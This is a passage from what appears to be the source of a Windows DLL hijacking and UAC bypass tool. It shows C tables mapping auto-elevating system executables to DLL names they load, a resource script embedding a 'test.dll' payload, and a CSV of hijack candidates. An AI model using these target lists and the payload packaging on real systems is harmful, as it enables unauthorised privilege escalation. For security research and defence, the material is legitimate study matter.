233 | 	"srvcli.dll",
234 | 	"SspiCli.dll",
235 | 	"urlmon.dll",
236 | 	"UxTheme.dll",
237 | 	"VSSAPI.DLL",
238 | 	"VssTrace.DLL",
239 | 	"wer.dll",
240 | 	"Wldp.dll",
241 | 	"WTSAPI32.dll",
242 | };
243 | const char* sluiT [] = {
244 | 	"profapi.dll",
245 | 	"PROPSYS.dll",
246 | 	"SLC.dll",
247 | 	"sppc.dll",
248 | 	"WINBRAND.dll",
249 | 	"Wldp.dll",
250 | 	"WTSAPI32.dll",
251 | };
252 | const char* systempropertiesadvancedT [] = {
253 | 	"bcd.dll",
254 | 	"credui.dll",
255 | 	"DNSAPI.dll",
256 | 	"DPAPI.dll",
257 | 	"DSROLE.DLL",
258 | 	"LOGONCLI.DLL",
259 | 	"NETAPI32.dll",
260 | 	"netid.dll",
261 | 	"NETUTILS.DLL",
262 | 	"profapi.dll",
263 | 	"SRVCLI.DLL",
264 | 	"TextShaping.dll",
265 | 	"USERENV.dll",
266 | 	"WINBRAND.dll",
267 | 	"WINSTA.dll",
268 | 	"WKSCLI.DLL",
269 | 	"Wldp.dll",
270 | };
271 | const char* systempropertiescomputernameT [] = {
272 | 	"bcd.dll",
273 | 	"profapi.dll",
274 | 	"USERENV.dll",
275 | 	"WINSTA.dll",
276 | };
277 | const char* systempropertiesdataexecutionpreventionT [] = {
278 | 	"bcd.dll",
279 | 	"profapi.dll",
280 | 	"USERENV.dll",
281 | 	"WINSTA.dll",
282 | };
283 | const char* systempropertieshardwareT [] = {
284 | 	"bcd.dll",
285 | 	"profapi.dll",
286 | 	"USERENV.dll",
287 | 	"WINSTA.dll",
288 | };
289 | const char* systempropertiesprotectionT [] = {
290 | 	"bcd.dll",
291 | 	"profapi.dll",
292 | 	"USERENV.dll",
293 | 	"WINSTA.dll",
294 | };
295 | const char* systempropertiesremoteT [] = {
296 | 	"bcd.dll",
297 | 	"profapi.dll",
298 | 	"USERENV.dll",
299 | 	"WINSTA.dll",
300 | };
301 | const char* systemresetT [] = {
302 | 	"bcd.dll",
303 | 	"Cabinet.dll",
304 | 	"d3d10warp.dll",
305 | 	"d3d11.dll",
306 | 	"dbgcore.DLL",
307 | 	"dbgcore.DLL",
308 | 	"DismApi.DLL",
309 | 	"DUI70.dll",
310 | 	"dxgi.dll",
311 | 	"FVEAPI.dll",
312 | 	"MSASN1.dll",
313 | 	"profapi.dll",
314 | 	"ReAgent.dll",
315 | 	"ResetEngine.dll",
316 | 	"tbs.dll",
317 | 	"VERSION.dll",
318 | 	"VSSAPI.DLL",
319 | 	"VssTrace.DLL",
320 | 	"WDSCORE.dll",
321 | 	"WIMGAPI.DLL",
322 | 	"WINHTTP.dll",
323 | 	"WOFUTIL.dll",
324 | 	"WTSAPI32.dll",
325 | 	"XmlLite.dll",
326 | };
327 | const char* systemsettingsadminflowsT [] = {
328 | 	"AppXDeploymentClient.dll",
329 | 	"Bcp47Langs.dll",
330 | 	"DEVOBJ.dll",
331 | 	"DEVRTL.dll",
332 | 	"DismApi.DLL",
333 | 	"DNSAPI.dll",
334 | 	"DUI70.dll",
335 | 	"FirewallAPI.dll",
336 | 	"fwbase.dll",
337 | 	"logoncli.dll",
338 | 	"netutils.dll",
339 | 	"newdev.dll",
340 | 	"PROPSYS.dll",
341 | 	"samcli.dll",
342 | 	"SspiCli.dll",
343 | 	"StateRepository.Core.dll",
344 | 	"SystemSettingsThresholdAdminFlowUI.dll",
345 | 	"timesync.dll",
346 | 	"USERENV.dll",
347 | 	"VERSION.dll",
348 | 	"WINBRAND.dll",
349 | 	"wincorlib.DLL",
350 | 	"wkscli.dll",
351 | 	"Wldp.dll",
352 | 	"WTSAPI32.dll",
353 | };
354 | const char* taskmgrT [] = {
355 | 	"credui.dll",
356 | 	"d3d11.dll",
357 | 	"d3d12.dll",
358 | 	"dxgi.dll",
359 | 	"pdh.dll",
360 | 	"UxTheme.dll",
361 | };
362 | const char* tcmsetupT [] = {
363 | 	"TAPI32.dll",
364 | };
365 | const char* wsresetT [] = {
366 | 	"licensemanagerapi.dll",
367 | 	"wevtapi.dll",
368 | 	"Wldp.dll",
369 | };
370 | const char* wusaT [] = {
371 | 	"dpx.dll",
372 | 	"WTSAPI32.dll",
373 | };
374 | 
375 | typedef struct {
376 | 	const char* name;
377 | 	const char** dllTable;
378 | 	int tableSize
379 | ;} DllList;
380 | 
381 | DllList dllList[] = {
382 | 	{"dfrgui.exe", dfrguiF, sizeof(dfrguiF) / sizeof(char*)},
383 | 	{"djoin.exe", djoinF, sizeof(djoinF) / sizeof(char*)},
384 | 	{"fsquirt.exe", fsquirtF, sizeof(fsquirtF) / sizeof(char*)},
385 | 	{"lpksetup.exe", lpksetupF, sizeof(lpksetupF) / sizeof(char*)},
386 | 	{"msdt.exe", msdtF, sizeof(msdtF) / sizeof(char*)},
387 | 	{"msra.exe", msraF, sizeof(msraF) / sizeof(char*)},
388 | 	{"slui.exe", sluiF, sizeof(sluiF) / sizeof(char*)},
389 | 	{"bthudtask.exe", bthudtaskT, sizeof(bthudtaskT) / sizeof(char*)},
390 | 	{"computerdefaults.exe", computerdefaultsT, sizeof(computerdefaultsT) / sizeof(char*)},
391 | 	{"dccw.exe", dccwT, sizeof(dccwT) / sizeof(char*)},
392 | 	{"djoin.exe", djoinT, sizeof(djoinT) / sizeof(char*)},
393 | 	{"easinvoker.exe", easinvokerT, sizeof(easinvokerT) / sizeof(char*)},
394 | 	{"easpolicymanagerbrokerhost.exe", easpolicymanagerbrokerhostT, sizeof(easpolicymanagerbrokerhostT) / sizeof(char*)},
395 | 	{"fodhelper.exe", fodhelperT, sizeof(fodhelperT) / sizeof(char*)},
396 | 	{"fsavailux.exe", fsavailuxT, sizeof(fsavailuxT) / sizeof(char*)},
397 | 	{"fsquirt.exe", fsquirtT, sizeof(fsquirtT) / sizeof(char*)},
398 | 	{"fxsunatd.exe", fxsunatdT, sizeof(fxsunatdT) / sizeof(char*)},
399 | 	{"immersivetpmvscmgrsvr.exe", immersivetpmvscmgrsvrT, sizeof(immersivetpmvscmgrsvrT) / sizeof(char*)},
400 | 	{"iscsicli.exe", iscsicliT, sizeof(iscsicliT) / sizeof(char*)},
401 | 	{"lpksetup.exe", lpksetupT, sizeof(lpksetupT) / sizeof(char*)},
402 | 	{"mdsched.exe", mdschedT, sizeof(mdschedT) / sizeof(char*)},
403 | 	{"mschedexe.exe", mschedexeT, sizeof(mschedexeT) / sizeof(char*)},
404 | 	{"msconfig.exe", msconfigT, sizeof(msconfigT) / sizeof(char*)},
405 | 	{"msdt.exe", msdtT, sizeof(msdtT) / sizeof(char*)},
406 | 	{"msra.exe", msraT, sizeof(msraT) / sizeof(char*)},
407 | 	{"multidigimon.exe", multidigimonT, sizeof(multidigimonT) / sizeof(char*)},
408 | 	{"netplwiz.exe", netplwizT, sizeof(netplwizT) / sizeof(char*)},
409 | 	{"optionalfeatures.exe", optionalfeaturesT, sizeof(optionalfeaturesT) / sizeof(char*)},
410 | 	{"perfmon.exe", perfmonT, sizeof(perfmonT) / sizeof(char*)},
411 | 	{"printui.exe", printuiT, sizeof(printuiT) / sizeof(char*)},
412 | 	{"recdisc.exe", recdiscT, sizeof(recdiscT) / sizeof(char*)},
413 | 	{"rstrui.exe", rstruiT, sizeof(rstruiT) / sizeof(char*)},
414 | 	{"sdclt.exe", sdcltT, sizeof(sdcltT) / sizeof(char*)},
415 | 	{"slui.exe", sluiT, sizeof(sluiT) / sizeof(char*)},
416 | 	{"systempropertiesadvanced.exe", systempropertiesadvancedT, sizeof(systempropertiesadvancedT) / sizeof(char*)},
417 | 	{"systempropertiescomputername.exe", systempropertiescomputernameT, sizeof(systempropertiescomputernameT) / sizeof(char*)},
418 | 	{"systempropertiesdataexecutionprevention.exe", systempropertiesdataexecutionpreventionT, sizeof(systempropertiesdataexecutionpreventionT) / sizeof(char*)},
419 | 	{"systempropertieshardware.exe", systempropertieshardwareT, sizeof(systempropertieshardwareT) / sizeof(char*)},
420 | 	{"systempropertiesprotection.exe", systempropertiesprotectionT, sizeof(systempropertiesprotectionT) / sizeof(char*)},
421 | 	{"systempropertiesremote.exe", systempropertiesremoteT, sizeof(systempropertiesremoteT) / sizeof(char*)},
422 | 	{"systemreset.exe", systemresetT, sizeof(systemresetT) / sizeof(char*)},
423 | 	{"systemsettingsadminflows.exe", systemsettingsadminflowsT, sizeof(systemsettingsadminflowsT) / sizeof(char*)},
424 | 	{"taskmgr.exe", taskmgrT, sizeof(taskmgrT) / sizeof(char*)},
425 | 	{"tcmsetup.exe", tcmsetupT, sizeof(tcmsetupT) / sizeof(char*)},
426 | 	{"wsreset.exe", wsresetT, sizeof(wsresetT) / sizeof(char*)},
427 | 	{"wusa.exe", wusaT, sizeof(wusaT) / sizeof(char*)},
428 | };
429 | 


--------------------------------------------------------------------------------
/DLLHijacking/UACBypass.rc:
--------------------------------------------------------------------------------
  1 | // Microsoft Visual C++ generated resource script.
  2 | //
  3 | #include "resource.h"
  4 | 
  5 | #define APSTUDIO_READONLY_SYMBOLS
  6 | /////////////////////////////////////////////////////////////////////////////
  7 | //
  8 | // Generated from the TEXTINCLUDE 2 resource.
  9 | //
 10 | #include "winres.h"
 11 | 
 12 | /////////////////////////////////////////////////////////////////////////////
 13 | #undef APSTUDIO_READONLY_SYMBOLS
 14 | 
 15 | /////////////////////////////////////////////////////////////////////////////
 16 | // English (United Kingdom) resources
 17 | 
 18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
 19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
 20 | 
 21 | #ifdef APSTUDIO_INVOKED
 22 | /////////////////////////////////////////////////////////////////////////////
 23 | //
 24 | // TEXTINCLUDE
 25 | //
 26 | 
 27 | 1 TEXTINCLUDE
 28 | BEGIN
 29 | "resource.h\0"
 30 | END
 31 | 
 32 | 2 TEXTINCLUDE
 33 | BEGIN
 34 | "#include ""winres.h""\r\n"
 35 | "\0"
 36 | END
 37 | 
 38 | 3 TEXTINCLUDE
 39 | BEGIN
 40 | "\r\n"
 41 | "\0"
 42 | END
 43 | 
 44 | #endif    // APSTUDIO_INVOKED
 45 | 
 46 | 
 47 | /////////////////////////////////////////////////////////////////////////////
 48 | //
 49 | // Icon
 50 | //
 51 | 
 52 | // Icon with lowest ID value placed first to ensure application icon
 53 | // remains consistent on all systems.
 54 | IDR_DATA1               DATA_32                    "..\\Release\\test.dll"
 55 | IDR_DATA2               DATA_64                    "..\\x64\\Release\\test.dll"
 56 | 
 57 | 
 58 | #endif    // English (United Kingdom) resources
 59 | /////////////////////////////////////////////////////////////////////////////
 60 | 
 61 | 
 62 | /////////////////////////////////////////////////////////////////////////////
 63 | // Neutral (Default) (unknown sub-lang: 0x8) resources
 64 | 
 65 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ZZZ)
 66 | LANGUAGE LANG_NEUTRAL, 0x8
 67 | 
 68 | /////////////////////////////////////////////////////////////////////////////
 69 | //
 70 | // Version
 71 | //
 72 | 
 73 | VS_VERSION_INFO VERSIONINFO
 74 | FILEVERSION 1, 0, 0, 3
 75 | PRODUCTVERSION 1, 0, 0, 3
 76 | FILEFLAGSMASK 0x3fL
 77 | #ifdef _DEBUG
 78 | FILEFLAGS 0x1L
 79 | #else
 80 | FILEFLAGS 0x0L
 81 | #endif
 82 | FILEOS 0x40004L
 83 | FILETYPE 0x1L
 84 | FILESUBTYPE 0x0L
 85 | BEGIN
 86 | BLOCK "StringFileInfo"
 87 | BEGIN
 88 | BLOCK "080904b0"
 89 | BEGIN
 90 | VALUE "CompanyName", "SecuProject"
 91 | VALUE "FileDescription", "DLLHijacking"
 92 | VALUE "FileVersion", "0.0.0.1"
 93 | VALUE "InternalName", "DLLHijacking.exe"
 94 | VALUE "LegalCopyright", "Copyright (C) 2021"
 95 | VALUE "OriginalFilename", "DLLHijacking.exe"
 96 | VALUE "ProductName", "SecuProject
 97 | "
 98 | VALUE "ProductVersion", "0.0.0.1"
 99 | END
100 | END
101 | BLOCK "VarFileInfo"
102 | BEGIN
103 | VALUE "Translation", 0x809, 1200
104 | END
105 | END
106 | 
107 | #endif    // Neutral (Default) (unknown sub-lang: 0x8) resources
108 | /////////////////////////////////////////////////////////////////////////////
109 | 
110 | 
111 | 
112 | #ifndef APSTUDIO_INVOKED
113 | /////////////////////////////////////////////////////////////////////////////
114 | //
115 | // Generated from the TEXTINCLUDE 3 resource.
116 | //
117 | 
118 | 
119 | /////////////////////////////////////////////////////////////////////////////
120 | #endif    // not APSTUDIO_INVOKED
121 | 
122 | 


--------------------------------------------------------------------------------
/DLLHijacking/dll_hijacking_candidates.csv:
--------------------------------------------------------------------------------
   1 | "Auto-elevated","Executable","DLL","Procedure"
   2 | FALSE,"agentservice.exe","ACTIVEDS.dll","DllMain"
   3 | FALSE,"agentservice.exe","adsldpc.dll","DllMain"
   4 | FALSE,"agentservice.exe","FLTLIB.DLL","DllMain"
   5 | FALSE,"applytrustoffline.exe","mintdh.dll","DllMain"
   6 | FALSE,"applytrustoffline.exe","mintdh.dll","TdhpSetWbemExtensionBlock"
   7 | FALSE,"applytrustoffline.exe","StateRepository.Core.dll","DllMain"
   8 | FALSE,"arp.exe","IPHLPAPI.DLL","DllMain"
   9 | FALSE,"arp.exe","snmpapi.dll","DllMain"
  10 | FALSE,"at.exe","cryptdll.dll","DllMain"
  11 | FALSE,"at.exe","netutils.dll","DllMain"
  12 | FALSE,"at.exe","NtlmShared.dll","DllMain"
  13 | FALSE,"at.exe","schedcli.dll","DllMain"
  14 | FALSE,"at.exe","schedcli.dll","NetScheduleJobEnum"
  15 | FALSE,"at.exe","sspicli.dll","DllMain"
  16 | FALSE,"at.exe","sspicli.dll","InitSecurityInterfaceW"
  17 | FALSE,"auditpol.exe","auditpolcore.dll","AdtEnableSinglePrivilege"
  18 | FALSE,"auditpol.exe","auditpolcore.dll","AuditPolicyData_DeleteAuditDataInstance"
  19 | FALSE,"auditpol.exe","auditpolcore.dll","DllMain"
  20 | FALSE,"auditpol.exe","auditpolcore.dll","LoadFormatStringAndPrintToConsole"
  21 | FALSE,"baaupdate.exe","FVEAPI.dll","DllMain"
  22 | FALSE,"bdechangepin.exe","FVEAPI.dll","DllMain"
  23 | FALSE,"bdechangepin.exe","FVEAPI.dll","FveGetAuthMethodInformation"
  24 | FALSE,"bdechangepin.exe","FVEAPI.dll","FveGetStatus"
  25 | FALSE,"bdechangepin.exe","FVEAPI.dll","FveOpenVolumeW"
  26 | FALSE,"bdeuisrv.exe","USERENV.dll","DllMain"
  27 | FALSE,"bdeuisrv.exe","WTSAPI32.dll","DllMain"
  28 | FALSE,"bioiso.exe","iumbase.DLL","DllMain"
  29 | FALSE,"bootim.exe","bcd.dll","BcdGetElementData"
  30 | FALSE,"bootim.exe","bcd.dll","BcdOpenObject"
  31 | FALSE,"bootim.exe","bcd.dll","BcdOpenSystemStore"
  32 | FALSE,"bootim.exe","bcd.dll","BcdQueryObject"
  33 | FALSE,"bootim.exe","bcd.dll","DllMain"
  34 | FALSE,"bootim.exe","BootMenuUX.DLL","CreateBareMetalRecoveryButton"
  35 | FALSE,"bootim.exe","BootMenuUX.DLL","CreateBootableOSButtonCollection"
  36 | FALSE,"bootim.exe","BootMenuUX.DLL","CreateCloudRecoveryButton"
  37 | FALSE,"bootim.exe","BootMenuUX.DLL","CreateDefaultOSButton"
  38 | FALSE,"bootim.exe","BootMenuUX.DLL","CreateDeviceListButton"
  39 | FALSE,"bootim.exe","BootMenuUX.DLL","CreateDirectFactoryResetButton"
  40 | FALSE,"bootim.exe","BootMenuUX.DLL","CreateOSListButton"
  41 | FALSE,"bootim.exe","BootMenuUX.DLL","CreateRecoveryToolsListButton"
  42 | FALSE,"bootim.exe","BootMenuUX.DLL","CreateSelectOSPage"
  43 | FALSE,"bootim.exe","BootMenuUX.DLL","CreateShutdownButton"
  44 | FALSE,"bootim.exe","BootMenuUX.DLL","DllMain"
  45 | FALSE,"bootim.exe","Cabinet.dll","DllMain"
  46 | FALSE,"bootim.exe","dbghelp.dll","DllMain"
  47 | FALSE,"bootim.exe","DismApi.DLL","DllMain"
  48 | FALSE,"bootim.exe","FLTLIB.DLL","DllMain"
  49 | FALSE,"bootim.exe","OLEACC.dll","DllMain"
  50 | FALSE,"bootim.exe","OLEACC.dll","GetRoleTextW"
  51 | FALSE,"bootim.exe","PROPSYS.dll","DllMain"
  52 | FALSE,"bootim.exe","PROPSYS.dll","PSCreateMemoryPropertyStore"
  53 | FALSE,"bootim.exe","ReAgent.dll","DllMain"
  54 | FALSE,"bootim.exe","ReAgent.dll","WinReGetConfig"
  55 | FALSE,"bootim.exe","ResetEng.dll","DllMain"
  56 | FALSE,"bootim.exe","tbs.dll","DllMain"
  57 | FALSE,"bootim.exe","VirtDisk.dll","DllMain"
  58 | FALSE,"bootim.exe","VSSAPI.DLL","DllMain"
  59 | FALSE,"bootim.exe","VssTrace.DLL","DllMain"
  60 | FALSE,"bootim.exe","WDSCORE.dll","ConstructPartialMsgVW"
  61 | FALSE,"bootim.exe","WDSCORE.dll","CurrentIP"
  62 | FALSE,"bootim.exe","WDSCORE.dll","DllMain"
  63 | FALSE,"bootim.exe","WDSCORE.dll","WdsSetupLogMessageW"
  64 | FALSE,"calc.exe","CRYPTBASE.DLL","DllMain"
  65 | FALSE,"calc.exe","edputil.dll","DllMain"
  66 | FALSE,"calc.exe","edputil.dll","EdpGetIsManaged"
  67 | FALSE,"calc.exe","MLANG.dll","ConvertINetUnicodeToMultiByte"
  68 | FALSE,"calc.exe","MLANG.dll","DllMain"
  69 | FALSE,"calc.exe","PROPSYS.dll","DllMain"
  70 | FALSE,"calc.exe","PROPSYS.dll","PSCreateMemoryPropertyStore"
  71 | FALSE,"calc.exe","PROPSYS.dll","PSPropertyBag_WriteDWORD"
  72 | FALSE,"calc.exe","Secur32.dll","DllMain"
  73 | FALSE,"calc.exe","SSPICLI.DLL","DllMain"
  74 | FALSE,"calc.exe","SSPICLI.DLL","GetUserNameExW"
  75 | FALSE,"calc.exe","WININET.dll","DllMain"
  76 | FALSE,"calc.exe","WININET.dll","GetUrlCacheEntryBinaryBlob"
  77 | FALSE,"certreq.exe","cscapi.dll","CscNetApiGetInterface"
  78 | FALSE,"certreq.exe","cscapi.dll","DllMain"
  79 | FALSE,"certreq.exe","DUI70.dll","DllMain"
  80 | FALSE,"certreq.exe","DUI70.dll","FlushThemeHandles"
  81 | FALSE,"certreq.exe","DUI70.dll","InitProcessPriv"
  82 | FALSE,"certreq.exe","DUI70.dll","InitThread"
  83 | FALSE,"certreq.exe","dwmapi.dll","DllMain"
  84 | FALSE,"certreq.exe","dwmapi.dll","DwmSetWindowAttribute"
  85 | FALSE,"certreq.exe","LINKINFO.dll","DllMain"
  86 | FALSE,"certreq.exe","LINKINFO.dll","IsValidLinkInfo"
  87 | FALSE,"certreq.exe","SSPICLI.DLL","DllMain"
  88 | FALSE,"certreq.exe","WindowsCodecs.dll","DllMain"
  89 | FALSE,"certreq.exe","WindowsCodecs.dll","WICCreateImagingFactory_Proxy"
  90 | FALSE,"certreq.exe","WININET.dll","DllMain"
  91 | FALSE,"certreq.exe","XmlLite.dll","CreateXmlReader"
  92 | FALSE,"certreq.exe","XmlLite.dll","CreateXmlReaderInputWithEncodingName"
  93 | FALSE,"certreq.exe","XmlLite.dll","DllMain"
  94 | FALSE,"certutil.exe","Cabinet.dll","DllMain"
  95 | FALSE,"certutil.exe","CRYPTUI.dll","DllMain"
  96 | FALSE,"certutil.exe","DSROLE.DLL","DllMain"
  97 | FALSE,"certutil.exe","LOGONCLI.DLL","DllMain"
  98 | FALSE,"certutil.exe","NETUTILS.DLL","DllMain"
  99 | FALSE,"certutil.exe","NTDSAPI.dll","DllMain"
 100 | FALSE,"certutil.exe","SAMCLI.DLL","DllMain"
 101 | FALSE,"certutil.exe","SSPICLI.DLL","DllMain"
 102 | FALSE,"change.exe","logoncli.dll","DllMain"
 103 | FALSE,"change.exe","netutils.dll","DllMain"
 104 | FALSE,"change.exe","samcli.dll","DllMain"
 105 | FALSE,"change.exe","srvcli.dll","DllMain"
 106 | FALSE,"change.exe","utildll.dll","DllMain"
 107 | FALSE,"change.exe","WINSTA.dll","DllMain"
 108 | FALSE,"charmap.exe","GetUName.dll","DllMain"
 109 | FALSE,"charmap.exe","MSFTEDIT.DLL","DllMain"
 110 | FALSE,"checknetisolation.exe","DNSAPI.dll","DllMain"
 111 | FALSE,"checknetisolation.exe","FirewallAPI.dll","DllMain"
 112 | FALSE,"checknetisolation.exe","fwbase.dll","DllMain"
 113 | FALSE,"checknetisolation.exe","fwbase.dll","FwAlloc"
 114 | FALSE,"checknetisolation.exe","fwbase.dll","FwCriticalSectionCreate"
 115 | FALSE,"checknetisolation.exe","fwbase.dll","FwCriticalSectionDestroy"
 116 | FALSE,"checknetisolation.exe","fwbase.dll","FwFree"
 117 | FALSE,"checknetisolation.exe","fwpuclnt.dll","DllMain"
 118 | FALSE,"chglogon.exe","logoncli.dll","DllMain"
 119 | FALSE,"chglogon.exe","netutils.dll","DllMain"
 120 | FALSE,"chglogon.exe","REGAPI.dll","DllMain"
 121 | FALSE,"chglogon.exe","samcli.dll","DllMain"
 122 | FALSE,"chglogon.exe","srvcli.dll","DllMain"
 123 | FALSE,"chglogon.exe","utildll.dll","DllMain"
 124 | FALSE,"chglogon.exe","WINSTA.dll","DllMain"
 125 | FALSE,"chgport.exe","logoncli.dll","DllMain"
 126 | FALSE,"chgport.exe","netutils.dll","DllMain"
 127 | FALSE,"chgport.exe","samcli.dll","DllMain"
 128 | FALSE,"chgport.exe","srvcli.dll","DllMain"
 129 | FALSE,"chgport.exe","utildll.dll","DllMain"
 130 | FALSE,"chgport.exe","WINSTA.dll","DllMain"
 131 | FALSE,"chkdsk.exe","DEVOBJ.dll","DllMain"
 132 | FALSE,"chkntfs.exe","DEVOBJ.dll","DllMain"
 133 | FALSE,"cipher.exe","DSROLE.dll","DllMain"
 134 | FALSE,"cipher.exe","EFSUTIL.dll","DllMain"
 135 | FALSE,"cipher.exe","FeClient.dll","DllMain"
 136 | FALSE,"cipher.exe","iertutil.dll","DllMain"
 137 | FALSE,"cipher.exe","NTDSAPI.dll","DllMain"
 138 | FALSE,"cipher.exe","VAULTCLI.dll","DllMain"
 139 | FALSE,"clipup.exe","CRYPTXML.dll","DllMain"
 140 | FALSE,"clipup.exe","webservices.dll","DllMain"
 141 | FALSE,"cmdl32.exe","Cabinet.dll","DllMain"
 142 | FALSE,"cmdl32.exe","cmpbk32.dll","DllMain"
 143 | FALSE,"cmdl32.exe","RASAPI32.dll","DllMain"
 144 | FALSE,"cmdl32.exe","rasman.dll","DllMain"
 145 | FALSE,"cmdl32.exe","WINHTTP.dll","DllMain"
 146 | FALSE,"colorcpl.exe","ColorAdapterClient.dll","DllMain"
 147 | FALSE,"colorcpl.exe","colorui.dll","DllMain"
 148 | FALSE,"colorcpl.exe","colorui.dll","LaunchColorCpl"
 149 | FALSE,"colorcpl.exe","IPHLPAPI.DLL","DllMain"
 150 | FALSE,"colorcpl.exe","mscms.dll","ColorCplInitialize"
 151 | FALSE,"colorcpl.exe","mscms.dll","ColorCplUninitialize"
 152 | FALSE,"colorcpl.exe","mscms.dll","DllMain"
 153 | FALSE,"colorcpl.exe","PROPSYS.dll","DllMain"
 154 | FALSE,"colorcpl.exe","USERENV.dll","DllMain"
 155 | FALSE,"compmgmtlauncher.exe","apphelp.dll","ApphelpCheckShellObject"
 156 | FALSE,"compmgmtlauncher.exe","apphelp.dll","DllMain"
 157 | FALSE,"compmgmtlauncher.exe","CLDAPI.dll","CfGetPlaceholderStateFromAttributeTag"
 158 | FALSE,"compmgmtlauncher.exe","CLDAPI.dll","DllMain"
 159 | FALSE,"compmgmtlauncher.exe","CRYPTBASE.dll","DllMain"
 160 | FALSE,"compmgmtlauncher.exe","CRYPTBASE.dll","SystemFunction036"
 161 | FALSE,"compmgmtlauncher.exe","edputil.dll","DllMain"
 162 | FALSE,"compmgmtlauncher.exe","edputil.dll","EdpGetIsManaged"
 163 | FALSE,"compmgmtlauncher.exe","FLTLIB.DLL","DllMain"
 164 | FALSE,"compmgmtlauncher.exe","PROPSYS.dll","DllMain"
 165 | FALSE,"compmgmtlauncher.exe","PROPSYS.dll","PSCreateMemoryPropertyStore"
 166 | FALSE,"compmgmtlauncher.exe","PROPSYS.dll","PSPropertyBag_WriteDWORD"
 167 | FALSE,"ctfmon.exe","MsCtfMonitor.DLL","DllMain"
 168 | FALSE,"ctfmon.exe","MsCtfMonitor.DLL","DoMsCtfMonitor"
 169 | FALSE,"ctfmon.exe","MSUTB.dll","DllMain"
 170 | FALSE,"ctfmon.exe","WINSTA.dll","DllMain"
 171 | FALSE,"cttune.exe","DWrite.dll","DllMain"
 172 | FALSE,"cttune.exe","DWrite.dll","DWriteCreateFactory"
 173 | FALSE,"cttune.exe","OLEACC.dll","DllMain"
 174 | FALSE,"cttune.exe","UxTheme.dll","DllMain"
 175 | FALSE,"dataexchangehost.exe","d2d1.dll","DllMain"
 176 | FALSE,"dataexchangehost.exe","d3d11.dll","DllMain"
 177 | FALSE,"dataexchangehost.exe","DWrite.dll","DllMain"
 178 | FALSE,"dataexchangehost.exe","dxgi.dll","DllMain"
 179 | FALSE,"datausagelivetiletask.exe","dusmapi.dll","DllMain"
 180 | FALSE,"datausagelivetiletask.exe","IPHLPAPI.DLL","DllMain"
 181 | FALSE,"ddodiag.exe","XmlLite.dll","CreateXmlReader"
 182 | FALSE,"ddodiag.exe","XmlLite.dll","DllMain"
 183 | FALSE,"deploymentcsphelper.exe","dbgcore.DLL","DllMain"
 184 | FALSE,"deploymentcsphelper.exe","DismApi.DLL","DllMain"
 185 | FALSE,"deploymentcsphelper.exe","WDSCORE.dll","ConstructPartialMsgVW"
 186 | FALSE,"deploymentcsphelper.exe","WDSCORE.dll","CurrentIP"
 187 | FALSE,"deploymentcsphelper.exe","WDSCORE.dll","DllMain"
 188 | FALSE,"deploymentcsphelper.exe","WDSCORE.dll","WdsInitialize"
 189 | FALSE,"deploymentcsphelper.exe","WDSCORE.dll","WdsSetupLogMessageW"
 190 | FALSE,"deploymentcsphelper.exe","WDSCORE.dll","WdsTerminate"
 191 | FALSE,"devicecensus.exe","dcntel.dll","DllMain"
 192 | FALSE,"devicecensus.exe","dcntel.dll","GetCensusRegistryLocation"
 193 | FALSE,"devicecensus.exe","dcntel.dll","RunSystemContextCensus"
 194 | FALSE,"devicecensus.exe","dcntel.dll","SetCustomTrigger"
 195 | FALSE,"devicecensus.exe","dcntel.dll","SetCustomTriggerEx"
 196 | FALSE,"devicecensus.exe","IPHLPAPI.DLL","DllMain"
 197 | FALSE,"devicecensus.exe","IPHLPAPI.DLL","GetAdaptersInfo"
 198 | FALSE,"devicecensus.exe","logoncli.dll","DllMain"
 199 | FALSE,"devicecensus.exe","logoncli.dll","DsGetDcNameW"
 200 | FALSE,"devicecensus.exe","netutils.dll","DllMain"
 201 | FALSE,"devicecensus.exe","netutils.dll","NetApiBufferAllocate"
 202 | FALSE,"devicecensus.exe","WINHTTP.dll","DllMain"
 203 | FALSE,"devicecredentialdeployment.exe","DeviceCredential.dll","DllMain"
 204 | FALSE,"deviceenroller.exe","DEVOBJ.dll","DllMain"
 205 | FALSE,"deviceenroller.exe","DMCmnUtils.dll","CopyString"
 206 | FALSE,"deviceenroller.exe","DMCmnUtils.dll","DllMain"
 207 | FALSE,"deviceenroller.exe","dmEnrollEngine.DLL","DllMain"
 208 | FALSE,"deviceenroller.exe","dmenterprisediagnostics.dll","DllMain"
 209 | FALSE,"deviceenroller.exe","iri.dll","DllMain"
 210 | FALSE,"deviceenroller.exe","netutils.dll","DllMain"
 211 | FALSE,"deviceenroller.exe","omadmapi.dll","DllMain"
 212 | FALSE,"deviceenroller.exe","omadmapi.dll","FreeCommandLineOptions"
 213 | FALSE,"deviceenroller.exe","omadmapi.dll","ProcessCommandLine"
 214 | FALSE,"deviceenroller.exe","samcli.dll","DllMain"
 215 | FALSE,"deviceenroller.exe","USERENV.dll","DllMain"
 216 | FALSE,"deviceenroller.exe","XmlLite.dll","DllMain"
 217 | FALSE,"devicepairingwizard.exe","dwmapi.dll","DllMain"
 218 | FALSE,"devicepairingwizard.exe","dwmapi.dll","DwmExtendFrameIntoClientArea"
 219 | FALSE,"devicepairingwizard.exe","OLEACC.dll","DllMain"
 220 | FALSE,"devicepairingwizard.exe","OLEACC.dll","GetRoleTextW"
 221 | FALSE,"dfrgui.exe","SXSHARED.dll","DllMain"
 222 | FALSE,"dfrgui.exe","SXSHARED.dll","SxTracerGetThreadContextRetail"
 223 | FALSE,"dialer.exe","rtutils.dll","DllMain"
 224 | FALSE,"dialer.exe","rtutils.dll","TraceRegisterExW"
 225 | FALSE,"dialer.exe","rtutils.dll","TraceVprintfExA"
 226 | FALSE,"dialer.exe","SspiCli.dll","DllMain"
 227 | FALSE,"dialer.exe","SspiCli.dll","GetUserNameExW"
 228 | FALSE,"dialer.exe","TAPI32.dll","DllMain"
 229 | FALSE,"dialer.exe","TAPI32.dll","lineInitializeExW"
 230 | FALSE,"disksnapshot.exe","CRYPTBASE.dll","DllMain"
 231 | FALSE,"disksnapshot.exe","CRYPTBASE.dll","SystemFunction036"
 232 | FALSE,"dispdiag.exe","DEVOBJ.dll","DevObjCreateDeviceInfoList"
 233 | FALSE,"dispdiag.exe","DEVOBJ.dll","DevObjDestroyDeviceInfoList"
 234 | FALSE,"dispdiag.exe","DEVOBJ.dll","DevObjGetClassDevs"
 235 | FALSE,"dispdiag.exe","DEVOBJ.dll","DllMain"
 236 | FALSE,"dispdiag.exe","DXVA2.dll","DllMain"
